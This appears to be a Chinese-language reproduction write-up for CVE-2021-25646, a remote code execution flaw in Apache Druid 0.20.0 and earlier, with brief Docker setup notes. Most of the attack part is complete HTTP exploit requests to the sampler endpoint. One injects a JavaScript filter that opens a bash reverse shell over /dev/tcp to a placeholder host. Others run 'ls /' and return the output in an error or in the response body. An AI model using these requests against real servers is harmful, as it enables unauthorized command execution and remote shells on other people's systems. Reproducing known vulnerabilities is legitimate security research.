CVE-2021-25646 Apache Druid RCE复现
简介
Druid是一个高效的数据查询系统,主要解决的是对于大量的基于时序的数据进行聚合查询。数据可以实时摄入,进入到Druid后立即可查,同时数据几乎是不可变。通常是基于时序的事实事件,事实发生后进入Druid,外部系统就可以对该事实进行查询。
影响版本
- <= 0.20.0
exp
反弹shell:
POST /druid/indexer/v1/sampler HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1044
Connection: close
{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xxx/xxx 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
复现
想调试源码来着,但是maven编译源码老有报错,提示签名错误(每次编译都得十几分钟)然后想用docker远程debug又一直开不出来端口,IDEA附加不上那个JVM,很头疼。
docker部署
在apache/druid 的github仓库下载0.20.0的源码:https://download.fastgit.org/apache/druid/archive/druid-0.20.0.zip
解压后打开文件夹/distribution/docker,执行命令docker-compose -f docker-compose.yml up就可以将镜像拉取到本地了。
由于漏洞主要存在于coordinator容器内,所以如果该组件关闭后会提示如下错误:
web页面默认部署在8888端口,打开后截图如下:
漏洞利用
点击Load Data按钮即可看到该数据包:
如果需要直接在http请求内回显,直接修改请求body内的functio (value)为如下内容即可:
function(value) {var b=new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec('ls /').getInputStream()));var buffer = new java.lang.StringBuffer();var s='';while((s=b.readLine())!=null){buffer.append(s).append('\\n');}throw new java.lang.Exception(buffer.toString());}
参考qax实验室大佬的文章,druid可以通过设置return格式直接回显=.=
POST /druid/indexer/v1/sampler HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1044
Connection: close
{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {var b=new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec('ls /').getInputStream()));var buffer = new java.lang.StringBuffer();var s='';while((s=b.readLine())!=null){buffer.append(s).append('\\n');}return {"res":buffer.toString()}}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
